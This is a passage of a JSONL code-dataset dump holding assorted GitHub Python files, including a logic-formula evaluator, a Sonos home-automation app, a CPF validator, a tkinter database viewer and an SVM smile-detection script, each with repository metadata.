mavutil.mavlink_connection(filename)\n\n while True:\n m = mlog.recv_match(type='PARAM_VALUE')\n if m is None:\n return\n pname = str(m.param_id).strip()\n if len(pname) > 0:\n parms[pname] = m.param_value\n\ntotal = 0.0\nfor filename in args:\n mavparms(filename)\n\nkeys = parms.keys()\nkeys.sort()\nfor p in keys:\n print(\"%-15s %.6f\" % (p, parms[p]))\n \n","repo_name":"jlnaudin/x-VTOLdrone","sub_path":"PixHawk_PX4/PX4Firmware/mavlink/share/pyshared/pymavlink/examples/mavparms.py","file_name":"mavparms.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"35"} +{"seq_id":"28478923166","text":"class VariableNotFound(Exception):\n '''A variable in Formula is not defined in zmienna'''\n pass\nclass WrongConstantValue(Exception):\n '''An init value in Stala is neither True or False'''\n pass\n\nclass Formula:\n def oblicz(self,zmienne):\n pass\n def uprosc(self):\n return self\n def __add__(self,f1):\n return Or(self,f1)\n def __mul__(self,f1):\n return And(self,f1)\n def findVar(self):\n pass\n def recTaut(self,idx, v, zm):\n if len(v) == len(zm):\n return self.oblicz(zm)\n zm.append([v[idx],True])\n l = self.recTaut(idx+1,v,zm)\n zm[idx][1]=False\n r = self.recTaut(idx+1,v,zm)\n return l and r\n def tautologia(self):\n var = list(filter(lambda x : x!='',self.findVar()))\n var = list(dict.fromkeys(var))#remove duplicates\n return self.recTaut(0,var,[])\n \nclass Stala(Formula):\n def __init__(self,v):\n try:\n if v!=True and v!=False:\n raise WrongConstantValue\n self.val = bool(v)\n except WrongConstantValue:\n print('value',v,'is neither True or False')\n self.val = None\n def __str__(self):\n return str(self.val)\n def oblicz(self,zmienne):\n return self.val\n def findVar(self):\n return ['']\n\nclass Zmienna(Formula):\n def __init__(self,n):\n self.name = str(n)\n def __str__(self):\n return self.name\n def findVar(self):\n return [self.name]\n def oblicz(self,zmienne):\n try:\n for z in zmienne:\n if self.name in z:\n return z[1]\n raise VariableNotFound\n except VariableNotFound:\n print('nieznana zmienna', self.name)\n return None\n\nclass Not(Formula):\n def __init__(self,f):\n self.f1 = f\n def uprosc(self):\n f1u = self.f1.uprosc()\n if type(f1u) == Stala:\n if f1u.oblicz([]) == False:\n return Stala(True)\n else:\n return Stala(False)\n return Not(f1u)\n def findVar(self):\n return self.f1.findVar()\n def __str__(self):\n return '-'+str(self.f1)\n def oblicz(self,zmienne):\n l 
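The interleavings record above is visibly damaged: it breaks off mid-expression at index_lst[-1] and resumes inside an unrelated pymavlink mavparms.py fragment, most likely because text between a '<' and a '>' was stripped during extraction. The missing span is left as a gap rather than guessed at. For reference, the problem its docstring states has a compact recursive solution; this is a sketch, not the original author's code:

def interleavings(s1, s2, prefix=""):
    # an interleaving preserves the relative order inside s1 and inside s2
    if not s1 and not s2:
        yield prefix
        return
    if s1:
        yield from interleavings(s1[1:], s2, prefix + s1[0])
    if s2:
        yield from interleavings(s1, s2[1:], prefix + s2[0])

print(list(interleavings("AB", "CD")))
# ['ABCD', 'ACBD', 'ACDB', 'CABD', 'CADB', 'CDAB'], matching the docstring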
= self.f1.oblicz(zmienne)\n if l is None:\n return None\n return not l\n\nclass And(Formula):\n def __init__(self,l,r):\n self.f1 = l\n self.f2 = r\n def uprosc(self):\n f1u = self.f1.uprosc()\n f2u = self.f2.uprosc()\n if type(f1u) == Stala:\n if f1u.oblicz([]) == False:\n return Stala(False)\n else:\n return f2u\n if type(f2u) == Stala: \n if f2u.oblicz([]) == False:\n return Stala(False)\n else:\n return f1u\n return And(f1u,f2u)\n def findVar(self):\n l = self.f1.findVar()\n r = self.f2.findVar()\n for x in r:\n l.append(x)\n return l\n def __str__(self):\n return '(' + str(self.f1) + ' & ' + str(self.f2) + ')'\n def oblicz(self,zmienne):\n l = self.f1.oblicz(zmienne)\n r = self.f2.oblicz(zmienne)\n if l is None or r is None:\n return None\n return l and r\n \nclass Or(Formula):\n def __init__(self,l,r):\n self.f1 = l\n self.f2 = r\n def uprosc(self):\n f1u = self.f1.uprosc()\n f2u = self.f2.uprosc()\n if type(f1u) == Stala:\n if f1u.oblicz([]) == True:\n return Stala(True)\n else:\n return f2u\n if type(f2u) == Stala: \n if f2u.oblicz([]) == True:\n return Stala(True)\n else:\n return f1u\n return Or(f1u,f2u)\n def findVar(self):\n l = self.f1.findVar()\n r = self.f2.findVar()\n for x in r:\n l.append(x)\n return l\n def __str__(self):\n return '(' + str(self.f1) + ' | ' + str(self.f2) + ')'\n def oblicz(self,zmienne):\n l = self.f1.oblicz(zmienne)\n r = self.f2.oblicz(zmienne)\n if l is None or r is None:\n return None\n return l or r\n \n \nf = Not(Stala(False))*Stala(True)+Stala(False)\nz = [['x',True]]\n\nprint(f, '.oblicz =', f.oblicz(z))\nprint()\n\ng = And(And(Stala(True),Stala(False)),Or(Stala(True),Zmienna('x')))\nprint(g, '.uprosc =' ,g.uprosc())\n\nh = And(And(Stala(True),Stala(True)),Or(Stala(False),Zmienna('x')))\nprint(h, '.uprosc =' ,h.uprosc())\n\nk = Or(And(Stala(True),Stala(True)),Or(Stala(False),Zmienna('x')))\nprint(k, '.uprosc =' ,k.uprosc())\n\nprint()\nfail = Zmienna('Y') + Stala(False)\nprint(fail, '.oblicz =', fail.oblicz(z), 'dla zmiennych =',z)\nfail = Stala('prawda')\nprint(fail, '.oblicz =', fail.oblicz(z), 'dla zmiennych =',z)\n\nprint()\nprint(h, '.oblicz =', h.oblicz(z))\n\nprint()\nl = And(Zmienna('x'),Zmienna('y'))\n\nz = [['y',False],['x',False]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\nz = [['y',False],['x',True]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\nz = [['y',True],['x',False]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\nz = [['y',True],['x',True]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\n\nprint()\ntaut = Or(Zmienna('y'),Or(Or(Zmienna('x'),Not(Zmienna('x'))),Zmienna('z')))\nprint(taut, '.tautologia = ', taut.tautologia())\nnottaut = And(Zmienna('y'),Or(Or(Zmienna('x'),Not(Zmienna('x'))),Zmienna('z')))\nprint(nottaut, '.tautologia = ', nottaut.tautologia())\n\nprint()\nprint(h, '.uprosc = ',h.uprosc(), '.tautologia =' ,h.uprosc().tautologia())\n","repo_name":"MaciejZientara/Studia","sub_path":"python/lista5/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39024298828","text":"import appdaemon.plugins.hass.hassapi as hass\nimport datetime\nimport time\n\nclass MusicSnapshot(hass.Hass):\n def initialize(self):\n entity_name = \"media_player.samsung_7_series_55\"\n self.media_entity = \"media_player.sonos_living_room\"\n self.my_enitity = self.get_entity(entity_name)\n self.my_enitity.listen_state(self.music_snapsnotcb, new = \"on\")\n 
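The propositional-logic record above implements tautologia() by recursing over variable assignments by hand. The same truth-table sweep can be expressed with itertools.product; a sketch under the assumption that a formula is modelled as a plain function of an assignment dict, which is not the record's class hierarchy:

from itertools import product

def is_tautology(formula, names):
    # try every True/False assignment of the named variables
    return all(
        formula(dict(zip(names, values)))
        for values in product([False, True], repeat=len(names))
    )

print(is_tautology(lambda v: v['x'] or not v['x'], ['x']))    # True
print(is_tautology(lambda v: v['x'] and v['y'], ['x', 'y']))  # False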
self.my_enitity.listen_state(self.music_restorecb, new = \"off\")\n \n def music_snapsnotcb(self, entity, attribute, old, new, kwargs):\n self.log(\"Creating Sonos snapshot\")\n self.sonos_enitity = self.get_entity(self.media_entity)\n #self.log(self.list_services())\n self.call_service(\"sonos/snapshot\", entity_id = self.media_entity)\n self.sonos_enitity.call_service(\"media_pause\")\n self.log_state_change(entity_name = self.media_entity)\n \n def music_restorecb(self, entity, attribute, old, new, kwargs):\n #Restore only until 23:00:00\n if self.now_is_between(start_time = \"08:00:00\", end_time = \"23:00:00\"):\n self.log(\"Restoring Sonos snapshot\")\n self.call_service(\"sonos/restore\", entity_id = self.media_entity)\n self.sonos_enitity = self.get_entity(self.media_entity)\n self.sonos_enitity.call_service(\"media_play\")\n self.log_state_change(entity_name = self.media_entity)\n \n def log_state_change(self, entity_name = \"\"):\n time.sleep(1)\n str = f\"Entity {entity_name} state change to {self.get_entity(entity_name).get_state()}\"\n self.log(str, ascii_encode=False)\n \n ","repo_name":"ankmanj/AppDaemonApps","sub_path":"music_snapshot.py","file_name":"music_snapshot.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26061288272","text":"#!/usr/bin/env python3\n\"\"\"Problem - Day 4\nGiven an array of integers, find the first missing positive integer in linear time and constant space. In other words, find the lowest positive integer that does not exist in the array. The array can contain duplicates and negative numbers as well.\nFor example, the input [3, 4, -1, 1] should give 2. The input [1, 2, 0] should give 3.\nYou can modify the input array in-place.\n\"\"\"\nL1 = [3, 4, -1, 1]\nL2 = [1, 2, 0]\n\n\ndef first_missing_pos(l):\n posl = sorted([n for n in l if n > 0])\n for n in enumerate(posl[1:]):\n if not n[1] == posl[n[0]] + 1:\n result = posl[n[0]] + 1\n return result\n result = posl[-1] + 1\n return result\n\n\nif __name__ == '__main__':\n print(first_missing_pos(L1))\n print(first_missing_pos(L2))\n","repo_name":"cbeach512/dailycodingproblem","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10565010737","text":"import json\nimport os\n\ndef convert_json(filename):\n with open(filename) as f:\n data = json.load(f)\n\n newData = [{\n 'dataset_name': os.path.basename(filename),\n 'image_link': '',\n 'annotation_type': 'image',\n 'annotation_objects': {},\n 'annotation_attributes': {}\n }]\n\n for obj in data['objects']:\n if obj['classTitle'] == 'Vehicle':\n newData[0]['annotation_objects']['vehicle'] = {\n 'presence': 1,\n 'bbox': obj['points']['exterior'][0] + obj['points']['exterior'][1]\n }\n newData[0]['annotation_attributes']['vehicle'] = {}\n for tag in obj['tags']:\n newData[0]['annotation_attributes']['vehicle'][tag['name']] = tag['value']\n elif obj['classTitle'] == 'License Plate':\n newData[0]['annotation_objects']['license_plate'] = {\n 'presence': 1,\n 'bbox': obj['points']['exterior'][0] + obj['points']['exterior'][1]\n }\n newData[0]['annotation_attributes']['license_plate'] = {}\n for tag in obj['tags']:\n newData[0]['annotation_attributes']['license_plate'][tag['name']] = tag['value']\n\n newFile = 'formatted_' + os.path.basename(filename)\n with open(newFile, 'w') as f:\n json.dump(newData, f, indent=4)\n 
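The day4.py record above does not actually meet its own docstring: sorting makes it O(n log n) rather than linear time with constant space, the scan returns the wrong answer whenever 1 itself is missing (first_missing_pos([2, 3]) gives 4 instead of 1), and duplicates can trip it ([1, 1, 2] gives 2 instead of 3). The classic in-place cyclic-placement version satisfies the stated constraints; a sketch, not the original author's code:

def first_missing_positive(nums):
    n = len(nums)
    for i in range(n):
        # swap nums[i] toward its home slot nums[nums[i] - 1] until stuck
        while 1 <= nums[i] <= n and nums[nums[i] - 1] != nums[i]:
            home = nums[i] - 1
            nums[i], nums[home] = nums[home], nums[i]
    for i in range(n):
        if nums[i] != i + 1:
            return i + 1
    return n + 1

print(first_missing_positive([3, 4, -1, 1]))  # 2
print(first_missing_positive([1, 2, 0]))      # 3
print(first_missing_positive([2, 3]))         # 1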
print(f'File created: {filename} to {newFile}')\n\ndef combine_jsons():\n folder_path = os.getcwd() # JSON files are in the current working directory\n\n combined_data = []\n json_files = ['pos_0.png.json', 'pos_10010.png.json', 'pos_10492.png.json']\n\n for json_file in json_files:\n with open(os.path.join(folder_path, json_file), 'r') as file:\n data = json.load(file)\n\n for obj in data['objects']:\n new_obj = {}\n if obj['classTitle'] == 'Vehicle':\n new_obj['class'] = 'car'\n elif obj['classTitle'] == 'License Plate':\n new_obj['class'] = 'number'\n\n new_obj['bounding_box'] = obj['points']['exterior'][0] + obj['points']['exterior'][1]\n combined_data.append(new_obj)\n\n combined_json = {'combined_objects': combined_data}\n combined_filename = 'combined.json'\n\n with open(combined_filename, 'w') as file:\n json.dump(combined_json, file, indent=4)\n\n print(f'Successfully combined JSON files into {combined_filename}')\n\n# Testing:::\njson_file1 = 'pos_0.png.json'\njson_file2 = 'pos_10010.png.json'\njson_file3 = 'pos_10492.png.json'\nconvert_json(json_file1)\nconvert_json(json_file2)\nconvert_json(json_file3)\ncombine_jsons()\n\n# to see newly created files: originally done on jupiter notebook\nwith open('combined.json','r') as f:\n dataShowCombined=json.load(f)\nprint(dataShowCombined)\n#-----------------------------------------------\nwith open('formatted_pos_0.png.json','r') as f:\n dataShow1=json.load(f)\nprint(dataShow1)\n#-----------------------------------------------\nwith open('formatted_pos_10010.png.json','r') as f:\n dataShow2=json.load(f)\nprint(dataShow2)\n#-----------------------------------------------\nwith open('formatted_pos_10492.png.json','r') as f:\n dataShow3=json.load(f)\nprint(dataShow3)","repo_name":"rifat328/Quantigo-AI-solution","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28136066564","text":"cpf = []\ncpfVerificacao = []\n\nwhile len(cpf) <= 10:\n Algarismos = int(input(\"Escreva um dígito do seu cpf de cada vez: \"))\n if len(str(Algarismos)) > 1:\n print(\"Nao pode escrever esse numero.\")\n else:\n cpf.append(Algarismos)\n cpfVerificacao.append(Algarismos)\n\ncpf.pop()\ncpf.pop()\n\nCondição = False\nCondição2 = False\n\nwhile Condição != True:\n contador = 10\n Multiplicados = []\n for i in cpf:\n resultado = i * contador\n Multiplicados.append(resultado)\n contador -= 1\n if contador == 1:\n Condição = True\n\nResto = sum(Multiplicados)%11 \n\ndef verificacao1(Valor):\n if Resto < 2:\n Dígito = 0 \n if Resto >= 2:\n Dígito = 11 - Resto \n return Dígito\n\ncpf.append(verificacao1(Resto))\n\nwhile Condição2 != True:\n contador2 = 11\n Multiplicados2 = []\n for i in cpf:\n resultado2 = i * contador2\n Multiplicados2.append(resultado2)\n contador2 -= 1\n if contador2 == 1:\n Condição2 = True\n\nResto2 = sum(Multiplicados2)%11 \n\ndef verificacao2(Valor2):\n if Resto2 < 2:\n Dígito2 = 0 \n if Resto2 >= 2:\n Dígito2 = 11 - Resto2 \n return Dígito2\n\ncpf.append(verificacao2(Resto2))\n\nif cpf == cpfVerificacao:\n print(\"CPF Válido\")\nelse:\n print(\"CPF Inválido\")","repo_name":"RogerPenha/Programa-de-Validacao-de-CPF","sub_path":"verificação-de-CPF.py","file_name":"verificação-de-CPF.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17241450893","text":"#!/usr/bin/env python\n#-*- coding:utf-8 
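The CPF record above writes the two check-digit passes as separate, near-identical while loops. The underlying mod-11 rule can be a single function; a compact sketch of the standard algorithm, not the original author's code:

def cpf_check_digit(digits):
    # weights count down from len(digits) + 1 to 2
    total = sum(d * w for d, w in zip(digits, range(len(digits) + 1, 1, -1)))
    remainder = total % 11
    return 0 if remainder < 2 else 11 - remainder

def cpf_valid(cpf):  # cpf: list of 11 ints
    return (cpf[9] == cpf_check_digit(cpf[:9])
            and cpf[10] == cpf_check_digit(cpf[:10]))

print(cpf_valid([1, 1, 1, 4, 4, 4, 7, 7, 7, 3, 5]))  # True; 111.444.777-35 is a well-known valid test number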
-*-\n\n'''14.py\n@author:cnfuyu\n@date:2013-4-11\n'''\n\nimport Image\n\nif __name__ == '__main__':\n im = Image.open('./python_challenge_14.png')\n nim = Image.new(im.mode, (100, 100))\n left, bottom, right, top = 0, 0, 99, 99\n x, y = 0, 0\n dirx, diry = 0, 1\n \n for t in range(10000):\n nim.putpixel( (x, y), im.getpixel( (t, 0) ) )\n if x == left and y == top:\n dirx, diry = 1, 0\n elif x == right and y == top:\n dirx, diry = 0, -1\n elif x == right and y == bottom:\n dirx, diry = -1, 0\n elif x == left + 1 and y == bottom:\n dirx, diry = 0, 1\n left += 1\n right -= 1\n top -= 1\n bottom += 1\n\n x += dirx\n y += diry\n \n nim.save('./python_challenge_result_14.png')\n\n","repo_name":"cnfuyu/pythonchallenge","sub_path":"python_challenge_14/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70006134822","text":"import serial_hex\nfrom PyQt5 import (QtCore, QtGui, QtWidgets)\nfrom ui_letter import Ui_LetterWidget\n\n\nclass LetterWidget(QtWidgets.QWidget, Ui_LetterWidget):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n def setLetter(self, letter):\n \"\"\"\n Returns a letter to the PyQt5 screen.\n \"\"\"\n\n self.letter.setText(letter.upper())\n data = serial_hex.charToBraille(letter).replace('0', '.').replace('1', 'O')\n data = data[0] + data[3] + '\\n' + data[1] + data[4] + '\\n' + data[2] + data[5]\n self.braille.setText(data)\n","repo_name":"braille-systems/braille-trainer","sub_path":"python/letter.py","file_name":"letter.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"15726926974","text":"a = \"y\"\r\nb = \"\"\r\nwhile (a == \"y\"):\r\n def binary_tree(x):\r\n return [x, [], []]\r\n def insert_left (root, new_branch):\r\n t = root.pop (1)\r\n if len(t)> 1:\r\n root.insert(1, [new_branch, t, []])\r\n else:\r\n root.insert(1, [new_branch, [], []])\r\n return root\r\n def insert_right(root, new_branch):\r\n t=root.pop(2)\r\n if len(t) > 1:\r\n root.insert (2, [new_branch, [], t])\r\n else:\r\n root.insert(2, [new_branch, [], []])\r\n return root\r\n def get_root_val(root):\r\n return root [0]\r\n def get_root_val(root, new_val):\r\n root[0] = new_val\r\n def get_left_child(root):\r\n return root [1]\r\n def get_right_child(root):\r\n return root[2]\r\n b = str (input(\"cuaca :\"))\r\n x = binary_tree(b)\r\n insert_left(x, str(input(\"cabang :\")))\r\n insert_left(x, str(input(\"pohon :\")))\r\n insert_right(x, str(input(\"ranting kanan :\")))\r\n insert_right(x, str(input(\"ranting kiri :\")))\r\n l = get_left_child(x)\r\n\r\n print(x)\r\n if (b == \" cerah\") or(b == \"lembab\"):\r\n print(\"hasil : bisa main\")\r\n elif (b == \"hujan\") or (b == \"angin\"):\r\n print(\"hasil : tidak main\")\r\n a = input (\" mau ulang \")\r\n","repo_name":"RiskaIndahCahyanti/struktur_data","sub_path":"tugas phyton riska.py","file_name":"tugas phyton riska.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34014795130","text":"from tkinter import *\nfrom tkinter.messagebox import showwarning, showinfo, askyesno\nfrom delete_database_queries import delete_worker\nfrom file_processing_module import save_file\n\nresult_key=None # результирующий ключ\ndialog_box_state = False # состояние окна диалога\n\n\ndef clicked_choice(window, key):\n global 
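In the binary-tree record above, get_root_val is defined twice; the second definition (the one taking new_val) silently shadows the first, so the getter becomes unreachable. The second was presumably meant to be a setter; a sketch of the fix:

def get_root_val(root):
    return root[0]

def set_root_val(root, new_val):
    # renamed so it no longer shadows the getter above
    root[0] = new_val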
result_key, dialog_box_state\n result_key=key\n dialog_box_state=False\n window.destroy()\n\n\ndef dialog_window(dict_keys):\n global result_key, dialog_box_state\n dialog_box_state=True\n dialogue = Tk()\n dialogue.title('Внимание')\n dialogue.geometry('400x200')\n inscription_1 = Label(dialogue, text=\"В результате поиска в системе \\nпо этим данным было обнаружено несколько работников\")\n inscription_1.pack(anchor='c')\n inscription_2 = Label(dialogue, text=\"Найденные данне по какому полю вывести?\")\n inscription_2.pack(anchor='c')\n \n for key in dict_keys:\n add_tab_btn = Button(dialogue, text=key, command=lambda: clicked_choice(dialogue, key)) \n add_tab_btn.pack(anchor='c')\n while True:\n if dialog_box_state==False:\n return result_key\n\n\ndef selection_data_display(data_dict):\n global dialog_box_state\n result_data_dict={}\n for key in data_dict:\n if data_dict[key]!=None:\n result_data_dict[key] = data_dict[key]\n if len(result_data_dict)>1:\n result_key = dialog_window(list(data_dict.keys()))\n result_data_dict = result_data_dict[result_key]\n elif len(result_data_dict)==0:\n return -1\n return list(result_data_dict.values())[0]\n\n\ndef creating_output_list(data_dict):\n output_list = [\"Личные данные работника\",\n f\"Имя: {data_dict['worker'][0][1]}\", f\"Фамилия: {data_dict['worker'][0][2]}\", f\"Отчество: {data_dict['worker'][0][3]}\", \n f\"Дата рождения: {data_dict['worker'][0][5]}\", f\"Семейное положение: {data_dict['family_status'][0][0]}\", \n f\"Количество детей: {data_dict['worker'][0][6]}\", \n \"Контакты\",\n f\"Почта: {data_dict['worker'][0][4]}\", f\"Номер телефона: {data_dict['phone'][0][0]}\", \n f\"Статус номера: {data_dict['phone'][0][1]}\", \n \"Рабочие данные\",\n f\"Должность: {data_dict['post'][0][0]}\", f\"Опыт работы: {data_dict['worker'][0][-2]}\", \n f\"Дата устройства: {data_dict['worker'][0][-4]}\", f\"Дата увольнения: {data_dict['worker'][0][-3]}\", \n f\"Тип трудоустройства: {data_dict['type_contract'][0][0]}\", f\"Зарплата: {data_dict['worker'][0][-1]}\", \n \"Адрес\", \n f\"Город: {data_dict['address'][0][0]}\", f\"Улица: {data_dict['address'][0][1]}\", \n f\"Номер улицы: {data_dict['address'][0][2]}\", f\"Этаж: {data_dict['address'][0][3]}\", \n f\"Номер квартиры: {data_dict['address'][0][4]}\", f\"Статус жилья: {data_dict['address'][0][-1]}\", \n \"Доккументы работника\", \n f\"Номер паспорта: {data_dict['documents'][0][0]}\", f\"Серия паспорта: {data_dict['documents'][0][1]}\", \n f\"Кем выдан: {data_dict['documents'][0][3]}\", f\"Номер снилс: {data_dict['documents'][0][2]}\"]\n \n return output_list\n\n\ndef clicked_clear(listbox, clear_btn, del_btn, save_btn):\n listbox.destroy()\n clear_btn.destroy()\n del_btn.destroy()\n save_btn.destroy()\n\n\ndef clicked_deletion(listbox, clear_btn, del_btn, save_btn, data_dict):\n result = askyesno(title=\"Подтвержение операции\", message=\"Вы действиетльно хотите удалить эти данные?\")\n if result: \n delete_worker(data_dict['worker'][0][0])\n showinfo(\"Результат\", \"Данные удалены\")\n clicked_clear(listbox, clear_btn, del_btn, save_btn)\n else: \n showinfo(\"Результат\", \"Операция отменена\")\n \n\ndef clicked_save(save_data):\n save_file(save_data)\n showinfo(\"Результат\", \"Успешно сохранено\")\n\n\ndef showing_data(one_tab, data_dict):\n data_dict=selection_data_display(data_dict)\n if data_dict!=-1:\n output_data = creating_output_list(data_dict)\n \n languages_var = StringVar(value=output_data)\n listbox = Listbox(one_tab, listvariable=languages_var, width=80, height=14)\n 
listbox.grid(column=0, row=5, columnspan=4)\n listbox.yview_scroll(number=1, what=\"units\")\n\n clear_btn = Button(one_tab, text=\"Очистить\", command=lambda: clicked_clear(listbox, clear_btn, save_btn, deletion_btn)) \n clear_btn.grid(column=6, row=6, padx=1, pady=1)\n\n save_btn = Button(one_tab, text=\"Сохранить данные в файл\", command=lambda: clicked_save(output_data)) \n save_btn.grid(column=6, row=7, padx=1, pady=1)\n \n deletion_btn = Button(one_tab, text=\"Удалить данные\", command=lambda: clicked_deletion(listbox, clear_btn, save_btn, deletion_btn, data_dict)) \n deletion_btn.grid(column=6, row=8, padx=1, pady=1)\n else:\n showwarning(title=\"Внимание\", message=\"Такого работника нет\")\n\n\n","repo_name":"Furiwarius/Homework_python_8","sub_path":"output_entered_data.py","file_name":"output_entered_data.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15525529479","text":"f = open('27985_B (1).txt')\nn = int(f.readline())\nd = [int(x) for x in f]\npr_max = 0\nfor i in range(n-1):\n for j in range(i+2, n):\n if (d[i] * d[j]) % 14 == 0:\n pr_max = max(pr_max, d[i] * d[j])\n \nprint(pr_max)\n","repo_name":"anyashishkina/python_tasks","sub_path":"ege/tests/apr_v14/27A_B.py","file_name":"27A_B.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"111041280","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 12 16:33:42 2021\n\n@author: johnh\n\"\"\"\nimport datetime\n\ntotal = int()\ndonations=[]\naddress = {'number': int(), 'street': str(), 'city': str(), 'state': str(), 'zipcodefive': int()}\nname = 'Example Donor'\nfirst = 'Example'\nlast = 'Donor'\nphone_number = str()\ndate = [int(), int(), int()]\nstatus = bool()\n\nx = datetime.datetime.now()\nxyear = x.year \nxday = x.day\nxmonth = x.month\n\nprint(type(xyear))\nprint(type(xday))\nprint(type(xmonth))\n\n#key is name, value is a list of data structures, 0 is donations, 1 is total, \n# 2 is list of fist and last names, 3 is address, 4 phone number,\n# 5 is last donation date, 6 is status\nstandard_data_dict_template = {'name':[donations, total, [first, last], None, None, None, None]}\nfull_data_dict_template = {'name':[donations, total, [first, last], address, phone_number, date, status]}","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/john_hunter/lesson09/mailroom_data_structure.py","file_name":"mailroom_data_structure.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"18170038859","text":"import time\r\nfrom sklearn import svm, preprocessing\r\nimport random\r\nimport numpy as np\r\nimport os\r\nfrom sklearn.externals import joblib\r\nimport sys\r\n\r\n\r\ndef view_bar(num, mes):\r\n rate_num = num\r\n number = int(rate_num / 4)\r\n hashes = '=' * number\r\n spaces = ' ' * (25 - number)\r\n r = \"\\r\\033[31;0m%s\\033[0m:[%s%s]\\033[32;0m%d%%\\033[0m\" % (mes, hashes, spaces, rate_num,)\r\n sys.stdout.write(r)\r\n sys.stdout.flush()\r\n\r\n\r\nlbp_file = open('result_output.txt', 'r')\r\nlbp_features = lbp_file.readlines()\r\nlbp_file.close()\r\nlbp_list = []\r\na = 0\r\nfor line in lbp_features:\r\n line = line.strip()\r\n line = eval(line)\r\n lbp_list.append(line)\r\n a += 1\r\n view_bar(a / 3884 * 100, 'LBP Processing')\r\nprint(\"\\nLbp has been loaded!\")\r\n\r\nlabel_file 
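Two bugs in the tkinter dialog record above are worth flagging: dialog_window spins in a while True loop waiting on a flag, which starves Tk's event loop, and command=lambda: clicked_choice(dialogue, key) captures key late, so every button reports the loop's last key. Tkinter's own blocking primitive is wait_window on a modal Toplevel; a sketch, not a drop-in patch:

import tkinter as tk

def choose_key(parent, keys):
    result = {}
    dialog = tk.Toplevel(parent)
    for key in keys:
        # the k=key default freezes the current key for each button
        tk.Button(dialog, text=key,
                  command=lambda k=key: (result.update(key=k), dialog.destroy())
                  ).pack()
    dialog.grab_set()           # make the dialog modal
    parent.wait_window(dialog)  # blocks here while events keep running
    return result.get('key')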
= open('real_labels.txt', 'r')\r\nlabels = label_file.readlines()\r\nlabel_file.close()\r\nlabel_list = []\r\nfor label in labels:\r\n label = label.strip()\r\n label_list.append(int(label))\r\nprint(\"Label has been loaded!\")\r\n\r\nxs = list(range(3880))\r\nrng = random.Random()\r\nrng.shuffle(xs)\r\nfold = [xs[388 * i:388 * (i + 1)] for i in range(10)]\r\nscores = []\r\nfor i in range(10):\r\n start = time.clock()\r\n print('Group' + str(i))\r\n path = fold[i]\r\n opath = [k for k in xs if k not in path]\r\n\r\n training = [lbp_list[i] for i in opath]\r\n training = np.array(training)\r\n label = [label_list[i] for i in opath]\r\n label = np.array(label)\r\n # scaler = preprocessing.StandardScaler()\r\n # training = scaler.fit_transform(training)\r\n\r\n # parameters = {\"kernel\": (\"linear\", \"rbf\"), \"C\": list(range(1, 100))}\r\n # svr = svm.SVC()\r\n # clf = grid_search.GridSearchCV(svr, parameters)\r\n # clf.fit(training, label)\r\n # print(clf.best_params_)\r\n clf = svm.SVC(kernel='poly', C=4000)\r\n clf.fit(training, label)\r\n print(\"Fit successfully!\")\r\n\r\n result = []\r\n for t in path:\r\n test = [lbp_list[t]]\r\n result.append(clf.predict(test))\r\n\r\n tp = 0\r\n fp = 0\r\n fn = 0\r\n for k in range(len(result)):\r\n if result[k] == [1] and path[k] <= 2132:\r\n tp += 1\r\n if result[k] == [1] and path[k] > 2132:\r\n fp += 1\r\n if result[k] == [0] and path[k] <= 2132:\r\n fn += 1\r\n f1 = 2 * tp / (2 * tp + fp + fn)\r\n print(f1)\r\n scores.append(f1)\r\n print(time.clock() - start)\r\n name = \"train_model\" + str(i) + \".m\"\r\n joblib.dump(clf, name)\r\n\r\nbest_score = max(scores)\r\ntotal = 0\r\nfor score in scores:\r\n total += score\r\nave_score = total / 10\r\nprint(\"The average F1 score is \" + str(ave_score))\r\nprint(\"The highest F1 score is \" + str(best_score))\r\ni = scores.index(best_score)\r\nprint(\"The best model is model\" + str(i))\r\nisexist = os.path.exists('train_model.m')\r\nif isexist:\r\n os.remove('train_model.m')\r\nfor k in range(10):\r\n if k != i:\r\n os.remove(\"train_model\" + str(k) + \".m\")\r\n else:\r\n os.rename(\"train_model\" + str(k) + \".m\", 'train_model.m')\r\n\r\n","repo_name":"fffffarmer/Smile-Detection","sub_path":"get_F1_score.py","file_name":"get_F1_score.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} 